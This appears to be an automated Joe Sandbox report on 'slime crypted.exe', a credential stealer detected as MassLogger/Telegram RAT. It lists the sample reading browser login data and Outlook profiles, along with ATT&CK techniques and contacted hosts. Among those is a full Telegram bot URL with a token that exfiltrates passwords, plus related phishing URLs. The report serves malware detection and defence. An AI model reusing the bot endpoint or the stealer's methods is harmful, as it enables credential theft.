Source: C:\Users\user\Desktop\slime crypted.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\slime crypted.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.slime crypted.exe.3e8e680.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.slime crypted.exe.3e8e680.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.slime crypted.exe.3e1e7e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.slime crypted.exe.3e4ae10.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4503437945.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2049154792.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4504752369.0000000003076000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: slime crypted.exe PID: 6600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4220, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.slime crypted.exe.3e8e680.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.slime crypted.exe.3e8e680.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.slime crypted.exe.3e1e7e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.slime crypted.exe.3e4ae10.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4503437945.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2049154792.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4504752369.0000000003076000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: slime crypted.exe PID: 6600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4220, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.slime crypted.exe.3e8e680.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.slime crypted.exe.3e8e680.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.slime crypted.exe.3e1e7e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.slime crypted.exe.3e4ae10.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4503437945.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2049154792.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4504752369.0000000003076000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: slime crypted.exe PID: 6600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4220, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.slime crypted.exe.3e8e680.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.slime crypted.exe.3e8e680.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.slime crypted.exe.3e1e7e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.slime crypted.exe.3e4ae10.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4503437945.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2049154792.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4504752369.0000000003076000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: slime crypted.exe PID: 6600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4220, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.slime crypted.exe.3e8e680.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.slime crypted.exe.3e8e680.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.slime crypted.exe.3e1e7e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.slime crypted.exe.3e4ae10.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4503437945.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2049154792.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4504752369.0000000003076000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: slime crypted.exe PID: 6600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4220, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
slime crypted.exe	42%	Virustotal		Browse
slime crypted.exe	54%	ReversingLabs	ByteCode-MSIL.Trojan.CrypterX
slime crypted.exe	100%	Avira	TR/Dropper.MSIL.Gen8
slime crypted.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.48.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.130.0	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
http://checkip.dyndns.org/	false	high
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot7800094213:AAHMlhEKdMHtO4l2EyUO6FynQMpnQElXees/sendDocument?chat_id=7832108732&caption=user%20/%20Passwords%20/%208.46.123.189	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://api.telegram.org	RegAsm.exe, 00000003.00000002.4504752369.0000000003076000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189l	RegAsm.exe, 00000003.00000002.4504752369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	RegAsm.exe, 00000003.00000002.4504752369.0000000003076000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.comd	RegAsm.exe, 00000003.00000002.4504752369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot7800094213:AAHMlhEKdMHtO4l2EyUO6FynQMpnQElXees/sendDocument?chat_id=7832	RegAsm.exe, 00000003.00000002.4504752369.0000000003076000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	slime crypted.exe, 00000000.00000002.2049154792.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4503437945.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
http://reallyfreegeoip.orgd	RegAsm.exe, 00000003.00000002.4504752369.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189d	RegAsm.exe, 00000003.00000002.4504752369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp	false	high
http://reallyfreegeoip.org	RegAsm.exe, 00000003.00000002.4504752369.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.orgd	RegAsm.exe, 00000003.00000002.4504752369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	RegAsm.exe, 00000003.00000002.4504752369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp	false	high
http://api.telegram.orgd	RegAsm.exe, 00000003.00000002.4504752369.0000000003076000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	RegAsm.exe, 00000003.00000002.4504752369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4504752369.0000000003076000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4504752369.0000000002F8E000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.com	RegAsm.exe, 00000003.00000002.4504752369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp	false	high
http://api.telegram.org	RegAsm.exe, 00000003.00000002.4504752369.0000000003076000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/d	RegAsm.exe, 00000003.00000002.4504752369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4504752369.0000000003076000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegAsm.exe, 00000003.00000002.4504752369.0000000002F21000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot-/sendDocument?chat_id=	slime crypted.exe, 00000000.00000002.2049154792.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4503437945.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	slime crypted.exe, 00000000.00000002.2049154792.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4504752369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4503437945.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.48.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590070
Start date and time:	2025-01-13 15:01:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	slime crypted.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 132 Number of non-executed functions: 13
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 13.107.253.45, 172.202.163.200
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:02:04	API Interceptor	12337867x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.48.1	ydJaT4b5N8.exe	Get hash	malicious	FormBook	Browse	www.vilakodsiy.sbs/vq3j/
	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	www.axis138ae.shop/j2vs/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	twirpx.org/administrator/index.php
	SN500, SN150 Spec.exe	Get hash	malicious	FormBook	Browse	www.antipromil.site/7ykh/
149.154.167.220	ElixirInjector.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse
	https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.net	Get hash	malicious	HTMLPhisher	Browse
	https://terrific-metal-countess.glitch.me/	Get hash	malicious	HTMLPhisher	Browse
	6uPVRnocVS.exe	Get hash	malicious	DCRat	Browse
	Udzp7lL5ns.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	nfKqna8HuC.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
193.122.130.0	MB263350411AE.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	b6AGgIJ87g.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	dZMT94YYwO.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	n0nsAzvYNd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rwlPT9YJt0.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	rOrders.scr.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	MB263350411AE.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	SOA.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	QUOTATION#090125-ELITEMARINE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	Order_list.scr.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Receipt-2502-AJL2024.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
reallyfreegeoip.org	rOrders.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	MB263350411AE.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	SOA.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	QUOTATION#090125-ELITEMARINE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
	Order_list.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	Receipt-2502-AJL2024.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
api.telegram.org	ElixirInjector.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.net	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://terrific-metal-countess.glitch.me/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	6uPVRnocVS.exe	Get hash	malicious	DCRat	Browse	149.154.167.220
	Udzp7lL5ns.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	nfKqna8HuC.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://id1223.adsalliance.xyz	Get hash	malicious	Unknown	Browse	162.247.243.29
	Cardfactory Executed Agreement DocsID- Sign & Review..eml	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	http://unioneconselvano.it/0kktkM-VkjxP-cvXwg-XC4J3-7f72j-pfTsY-7uK529r.php	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://www.google.ca/url?subgn1=https://www.fordbeckerandgutierrez.com&SQ=WA&SQ=F5&SQ=R7&TA=W4&SQ=L6&q=%2561%256d%2570%2F%2573%256D%2569%2568%256B%2538%252E%2564%2565%256B%2563%2568%256F%2562%2574%2569%2565%2577%252E%2563%256F%256D%252F%256A%2576%2561%256E%256E%2561%2574%2574%2565%256E%2540%2561%2572%2572%256F%2577%2562%2561%256E%256B%252E%2563%256F%256D&opdg=ejM&cFQ=QXo&STA=MHY	Get hash	malicious	HTMLPhisher	Browse	104.17.245.203
	https://emailcaptain.pages.dev/dimitar?login=eXVsdXlldl9hbkByZnMucnU=&page=_adobe	Get hash	malicious	Unknown	Browse	172.67.169.194
	DOCS974i7C63.pdf	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	NVIDIAShare.exe.bin.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.64.1
	DOCS974i7C63.pdf	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	bridgenet.exe.bin.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.112.1
	rOrders.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
TELEGRAMRU	ElixirInjector.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.net	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	UWYXurYZ2x.exe	Get hash	malicious	LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer	Browse	149.154.167.99
	http://www.eovph.icu/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://www.eghwr.icu/	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://telegrams-mc.org/	Get hash	malicious	Unknown	Browse	149.154.170.96
ORACLE-BMC-31898US	MB263350411AE.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	SOA.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	trow.exe	Get hash	malicious	Unknown	Browse	147.154.3.56
	nfKqna8HuC.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	aS39AS7b0P.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	gGI2gVBI0f.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	ZpYFG94D4C.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	rOrders.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	MB263350411AE.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.48.1
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	SOA.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.48.1
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	QUOTATION#090125-ELITEMARINE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.48.1
	Order_list.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	Receipt-2502-AJL2024.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
3b5074b1b5d032e5620f69f9f700ff0e	http://id1223.adsalliance.xyz	Get hash	malicious	Unknown	Browse	149.154.167.220
	ElixirInjector.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
